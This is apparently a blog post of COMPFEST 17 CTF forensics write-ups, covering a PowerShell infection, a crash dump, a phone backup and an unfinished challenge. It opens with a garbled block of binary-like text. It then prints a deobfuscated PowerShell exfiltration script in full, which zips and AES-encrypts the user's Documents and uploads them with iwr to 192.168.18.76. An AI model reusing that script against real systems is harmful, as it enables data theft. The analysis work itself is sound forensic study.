'#9 49 7)7#^49 [4:7)#4)#]'?#74 \	)=\47#79  	):)#]$)7 #X9#44<?' 	9 97"4977#Y79	4)7T7)#=79&]$49#9"F$)Y$9#4)#849#4 	)#<94Z 94#9<; 8	9#U7	<97F$9"+	4Y4) ]	9 75#774799]) &	9"94 ?97'X)#	9"49#[ 77 \4 897)'9479#4)#	 9")	 #;)';)78# 	):49 49779;_49 
7)77)<]4)#'4 8X$)"$9#	7?74) 9"9"	7)#7?)#')77)#7=_4 	#*78	)#'4 94X$9 7)74]4)#F$)"'"9#7)#(	)'X ?)#[	9=\4#Y?97Z$&7)#Y4#4)#494	9"]$4:#9"'8 7 9#7	 79 Z	) :	)	]$)"!' !	#\4)#	9"	"<)# 9#4?^<97_$)7799]4#7 _494X	)#'	#9" ')"B$)5\4)#F	9 :7)=\4 	 <#94#)74;?9#Z4)#7	X4# 	77)=) T89#[449"T4#9&9#4 ^;9: 7)#) 	)?X '	 <9 ^<97>? ;9:'9"*	)"?799 U4 #^47 7)#(	79" 	9<97$9"U	9;]9"7 ?\ $79#>7897$)77\4)# Y	X #;4U8)9#)74)#Y7)_4 U	#.79"	)#X'4,#)'_ 9 ;#) 	'4;4]89#7)4]9"F 87)<$)#U ,7"\494\4 7)? ?)7 '#/	9\497?)7$#984)77)#;7	]$4U # 95 ) 5')7";;9#7)#\	9>X ^7) 7';] $79#Y7)7 U47<)'#	9#74?)7##7489#77 4)>) +	)#$)	9"X'9477)#*79 77]4 
	974$_4)#*') '#Y4)#^9 /79#8)7')#"	99#4)#8"Y$#79"=7&#9#]49#	)879" 7)#	!77Z4 ??X4$7)#5	9!79#$7479 X4 7;) $#77Z49"B4] 49 <9$7;7 T9&9#)?)7T$94$)#	 >	&\4)#"	 &	9"4#<?) ')479#4#U9'\44??97X74 79"97 )>9#!7 ;	=)7]777$<)7^$) ':74.7)#	794)#%7 ;	$7#\4)#T'9<$)"7)#	?4) :;97Z78 79">7)#$	497[49"474] (	9#;79]<)7') ':\4#8	9":7?Y4 7 ^?<)7$ U		9# 4 [	)7
777)#<4])79 $) 	)77	]97'94='7$) X$9#:7)>79"U74 7&]7=79779&') <'9#[4:79 797?9'7;)#'')9$)#=7977=4)7%') [$)	$94[')#	9"47 )&4 97)7#4 Z)#=	' $) '9<\4479"_49!7)#	77997)7,') '#\4)779 7"?97$7T89!]$) $)#7=79 Y7)7&')5$ '	9#779"Z79 78]97U47^4)"< _	9".?8) 	;97"'9 ;)#') ^')<]749779'4	)#:	)49#^7944);477?)7Y'9\4 	9#7)	Y4#84'\4479"495_<)7Y') '>\4 	 [	$\ :79#)7 8)78') $)5$ )#'	779#B4)74)=\ 474]<4;9#?5?9"^<#? ?  ;) 89!89#>? 895\894X##		79#,7)#Z$99$) $)7,7\4)#U9"#?9;]44 49"479 Y4 /?)7X']9#<7#^<94	9"Z 	;]4:# 	'9'49749#"79!')"(74&7)>7#7 	98]49 79 7)7]$45;) B89?9# ?)#(;9	##X	974)?\4)#' $9'#94	)74_  7)#'?# ') 5	9=X494,	97$):Y44.794]7$_4 ]	)#7	49 Y7)#'8;) 8)7?"\<)#;94#_9779#F47]$ Z$)7Z =74[7)#4?4)#%7 	!7#4)#[$97#9"#')7"	";9"[$)"F4$]#,7977)\44#?97$) <9 ?9"F7)X49"<?9"4?) X< "? <9< 
? Z<)!<9 ?9 5?)<9 U?9 ?9><9 <9 <:<9 9?9 [<8<9  ?)#'9$$)7=79#):79"!7)"	994)7<)7'9'$)7:77<7:]497)79 4:8)7:')#^	):\4#<)"'5; ?9 )?9X49"879"<?8X<9"&? ?9?< +? $?4<9 4?9 ?9'<9 Z<9 T?!<9 <9 <) <9 Z<9 <)	<9 ?9 ?9;]$4_	)"^4549 *79#5?)577#?)9	9"&'9#	#9& 97	'97')? )"')"7') 79"_77477)7.')7#9Y44794U49=_4 	)#T4449 *7)#$$##$9799	4)7,;#;)7 )7_$)='7 ;9"'Y$#X'9787\$)#$ $')><9 $94X)"#Z!_9#	)#
	  	9 	 74977<74 74:779"4)"Y795^4#79#F4<]4 57 49'494 ;9";?Y8#4;#?;;\8)#Y8 F8=89 $;) 8)= ?97^<)7??49?94<9'X<)")?#$?)_<9#?)#[?8< $?9 4?9	X )"##Y#	_ 9#?#)#^    9 #9# #$)7"#$<9 ?9"F498X49"<9"8?	X< *? <>< ?? <><9 ?9 	?)4<9 %?9 <)<9 ?9  ?&<9 .?9 ^<9:<9 T?)#^''T %'JJE
>Y[/ +WW0.C >6E
>*CU+98WW0
	(C9C >6JVI6@\CC@EIC!
D0M@MJJMM';$xd=[System.Convert]::FromBase64String($c);$rd='';foreach($b in $xd){$rd+=[char]($b -bxor $x)};iex $rd |
The above code can be simplified to:
1 | $x=109;$c='...';$xd=[System.Convert]::FromBase64String($c);$rd='';foreach($b in $xd){$rd+=[char]($b -bxor $x)};iex $rd |
By changing the iex
at the end to Write-Host
, we can make the script output the decrypted result:
1 | $x=109;$c='...';$xd=[System.Convert]::FromBase64String($c);$rd='';foreach($b in $xd){$rd+=[char]($b -bxor $x)};Write-Host $rd |
Running it gives:
1 | $r ='...' | iex |
By removing the | iex
part layer by layer and re-running the script, we eventually deobfuscate it to the final layer:
1 | $AAAAAAAAAAAAAABBBBBIIIiiAB='0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz!@#$%^&()_+-=[]{}~';$aadsfjkh=-join((1..15)|ForEach{$AAAAAAAAAAAAAABBBBBIIIiiAB[(Get-Random -Maximum $AAAAAAAAAAAAAABBBBBIIIiiAB.Length)]});$fnsdadkj="$env:TEMP\$aadsfjkh.zip";$cvmz="$env:TEMP\$aadsfjkh.enc";try{Get-ChildItem "$env:USERPROFILE\Documents" -Recurse -File|Where-Object{-not $_.PSIsContainer -and $_.Name -notlike "*transcript*" -and $_.Name -notlike "*.tmp"}|Compress-Archive -DestinationPath $fnsdadkj -CompressionLevel Fastest -ErrorAction SilentlyContinue;if(Test-Path $fnsdadkj){$pqoero=New-Object byte[] 16;$dma=New-Object byte[] 16;$zfsfdm=[System.Security.Cryptography.RNGCryptoServiceProvider]::Create();$zfsfdm.GetBytes($pqoero);$zfsfdm.GetBytes($dma);$zfsfdm.Dispose();$dmafnaas=[System.Security.Cryptography.Aes]::Create();$dmafnaas.Key=$pqoero;$dmafnaas.IV=$dma;$encryptor=$dmafnaas.CreateEncryptor();$dfnalkns=[System.IO.File]::ReadAllBytes($fnsdadkj);$agbaghb=$encryptor.TransformFinalBlock($dfnalkns,0,$dfnalkns.Length);$dmafnaas.Dispose();$combinedBytes=$pqoero+$agbaghb+$dma;[System.IO.File]::WriteAllBytes($cvmz,$combinedBytes);Remove-Item $fnsdadkj -Force -ErrorAction SilentlyContinue;iwr -Uri "http://192.168.18.76:8080/upload" -Method Post -InFile $cvmz -ContentType "application/octet-stream" -Headers @{"X-Filename"=(Split-Path $cvmz -Leaf)} -ErrorAction SilentlyContinue|Out-Null;if(Test-Path $cvmz){Remove-Item $cvmz -Force -ErrorAction SilentlyContinue}}}catch{} |
The file transferred to /upload
can be extracted from the traffic capture. This is the ciphertext.
We can write a Python script to recover this file:
- Read the
.enc
file. - Split the file into three parts: the first 16 bytes are the Key, the last 16 bytes are the Initialization Vector (IV), and the middle part is the encrypted data.
- Use the extracted Key and IV to perform AES decryption on the encrypted data.
- Remove the padding from the end of the decrypted data.
- Save the final plaintext data as a
.zip
file.
1 | from Crypto.Cipher import AES |
After decompressing the zip file, the flag is found inside a PDF file.
FLAG
1 | COMPFEST17{powershell_script_logging_is_very_powerfull_b4ffdc5da5} |
crash out
Challenge
Evan installed and executed a supposedly safe file. It caused his laptop to hang, several data to become corrupted, and new password-protected files to show up. The password popped up for a while, but I didn’t memorize it. Can you get me back my file?
Solution
First, I mounted the image using FTK as the F drive.
I started by finding a genuinely encrypted zip file at F:\Users\Evan\Documents\89a0b289f0221.zip
, but I couldn’t figure out the password.
Then, I located the file F:\Users\Evan\Downloads\upload_queue\file.enc
. The strange thing about this file was that its header was that of a JPG, but it couldn’t be opened correctly after changing the extension to .jpg
. This led me to suspect it was encrypted.
Next, I found a suspicious file: F:\ProgramData\Dumps\chrome_updater.exe.34368.dmp
. Attempting to open it with WinDbg resulted in an error, so I resorted to analyzing the strings within it.
Searching for 89a0b289f0221.zip
or file.enc
inside the dump led me to this line:
1 | C:\\Users\\Evan\\Documents\\89a0b289f0221.zip whereourcrashis --flag= --crash= null div raise --wait= --path= C:\\Users\\Evan\\Downloads\\upload_queue\\file.enc chrome_updater.exe |
- chrome_updater.exe: This is the executed program. Based on its name, it’s likely an updater for a Chromium-based application, which fits the challenge description of a “supposedly safe file”.
- –crash= null div raise: This parameter explicitly instructs the program to perform an operation that will cause a crash.
- null: Likely represents a “null pointer dereference”.
- div: Likely represents a “division-by-zero error”.
- raise: Likely represents “throwing an exception”.
- whereourcrashis: This string is very colloquial, like a comment left by a developer. This ties into the theme of the challenge, not only confirming that this file is essential to the solution but also suggesting that the string itself will be very useful later.
I then tried to find chrome_updater.exe
for reverse engineering but couldn’t locate it. However, during the search, I found a related Windows Error Reporting (WER) file: F:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_chrome_updater.e_7b71673944fedcfebbd880da83474929a7d18741_38b31a53_7dfb28da-126b-49f8-a06-216c4072ac0a\Report.wer
. It contained the following content:
1 | EventType=APPCRASH |
- EventType=APPCRASH: The event type is an application crash.
- Sig[6].Name=Exception Code; Sig[6].Value=c0000005:
c0000005
is the Windows exception code for an access violation. The most common cause of this exception is a null pointer dereference—that is, the program attempted to read from or write to a NULL memory address.
This matched my earlier speculation, confirming that chrome_updater.exe
, 89a0b289f0221.zip
, and file.enc
are highly relevant files for this challenge. The meaningful string whereourcrashis
from the command line is also very likely related.
Connecting the dots—I couldn’t find the password for 89a0b289f0221.zip
, and the string whereourcrashis
appeared right next to the zip file in the command—it was reasonable to infer that whereourcrashis
was the password for 89a0b289f0221.zip
. Trying it confirmed this suspicion.
After decompressing 89a0b289f0221.zip
, I obtained a script for file encryption named script.py
, with the following content:
1 | import sys |
I noticed the usage example was python3 script.py encrypt input.jpg output.enc
. Considering the file.enc
I had found, it was highly probable that it was encrypted by this very script. Therefore, I wrote a corresponding decryption script:
1 | import sys |
Both encryption and decryption require a password. So far, the only password-like string I had encountered was whereourcrashis
. I used it to decrypt file.enc
, and as expected, it successfully decrypted into a JPG image.
There was only the image with no other information, so I suspected steganography. While checking the image’s EXIF information, I found a clue:
1 | Exif Image Width : 1080 |
The EXIF information indicated the image dimensions were 1080x1080, but the actual size of the image was 1080x1024. This was clearly a case of JPG height/width steganography. After correcting the height, the flag was revealed at the bottom of the image.
FLAG
1 | COMPFEST17{cr4sh1ng_1nt0_th3_v0001d_b00m_boOm_B00M!!_b51a77934b} |
Mr & Mrs Smith
Challenge
A couple in our office has been rather suspicious these past few weeks, though I cant do much as the guy’s father hold an authorative position. A few days ago he asked me to help back up his phone, and I managed to keep several information just in case I find something to prove my suspicions. Hmm, what does he usually do with his phone?
Chall: https://drive.google.com/drive/folders/1mM3LckA_NZ5O-NskteQOE_8V-R7_g-Dk?usp=sharing
Zip password : 2a07b93ef0362ba7286d536ac1e16c17
Solution
In the SQLite Files section, by sorting by modification date in descending order, we can see that only two files were modified in 2025: bugle_db.db
on 2025-08-20, and calendar.db
on 2025-08-12.
The bugle_db.db
file stores the phone’s SMS messages. Let’s examine it for any useful information.
In the message_text
table, the following conversation was found:
1 | Hey, did you finish documenting the warehouse issues? |
A Google Drive link is mentioned in the conversation: https://drive.google.com/drive/folders/1wfF_RRAp_dyzDzHeNJhe4CvZNs9qbwUK?usp=sharing
Inside this Google Drive folder, an encrypted file named classified.pdf.gpg
was found.
From the conversation, we can also gather the following information:
The couple is not having an affair; they are actually whistleblowers. They are secretly collecting evidence of serious safety violations in the company’s warehouse and plan to submit it to the regulatory board next week to protect the workers. The man’s father is a high-ranking executive in the company, which adds significant pressure and risk to their investigation, explaining their need for secrecy.
"Great! What's the access code again?" "It's encrypted with the date of our first date-location, like 23122025-londonbridge"
This exchange reveals the password format for the file in Google Drive: DDMMYYYY-locationname
. The location format is all lowercase with no spaces (e.g., londonbridge
). The next step is to find the date and location of their first date.
"I'm pretty shocked to hear that you remember our anniversary." "Yeah, I always keep a reminder of important dates and events on my phone.
These two lines imply that the date of their first date is recorded on the phone. Following this lead, we’ll now examine calendar.db
.
In record #16 of the Event
table, we find an “Anniversary” event with the description We started dating, and took a picture to commemorate it
. The dtstart
timestamp is 1583193600000
, and the eventTimezone
is America/New_York
. Converting this timestamp gives us the date March 3, 2020. This provides the first part of the password: 03032020
.
Following the clue from the record, “took a picture to commemorate it,” we now look for the photo. By filtering the images for a modification date between March 2, 2020, and March 4, 2020, we find a single image:
Below is its EXIF information:
1 | ... |
Next, searching for 40°47'06.3"N 73°58'05.8"W
on Google Maps reveals that the photo was taken in Central Park:
Therefore, the second part of the password is centralpark
. Combining both parts, the full password is 03032020-centralpark
.
Next, we use the password 03032020-centralpark
to decrypt the classified.pdf.gpg
file:
1 | ┌──(kali㉿kali)-[~/Desktop] |
The flag is found in the decrypted classified.pdf
file.
FLAG
1 | COMPFEST17{p4rtners_wh0_w0rk_t0gether_t00_w3ll_5b3c71c672} |
Update Required
Challenge
A researcher in Mondstadt’s tech division received an urgent-looking HTML file, claiming to be a critical security patch. Trusting its source, they executed antivirus.exe and moments later, a secret PDF file disappeared.
The PDF contained a confidential override PIN tied to the Vision Distribution Network. To protect it, the researcher locked the PDF with their wallet’s seed phrase (exported from a Chrome extension), joined with an underscore (_) as the password.
Although the wallet vault file remains on disk, the password to unlock it has since been lost. Fortunately, there’s a lead: the researcher once copied the vault password to clipboard.
Chall: https://drive.google.com/drive/folders/1R1psX7e04W1aJXFHK_WbNkRt5ukFXOlc?usp=sharing
Zip password : soalinigasusahkokxixixixi
Solution
TBD
FLAG
TBD
- 标题: COMPFEST CTF 2025
- 作者: Aristore
- 创建于 : 2025-10-05 17:45:00
- 更新于 : 2025-10-05 17:46:42
- 链接: https://www.aristore.top/posts/COMPFEST17/
- 版权声明: 版权所有 © Aristore,禁止转载。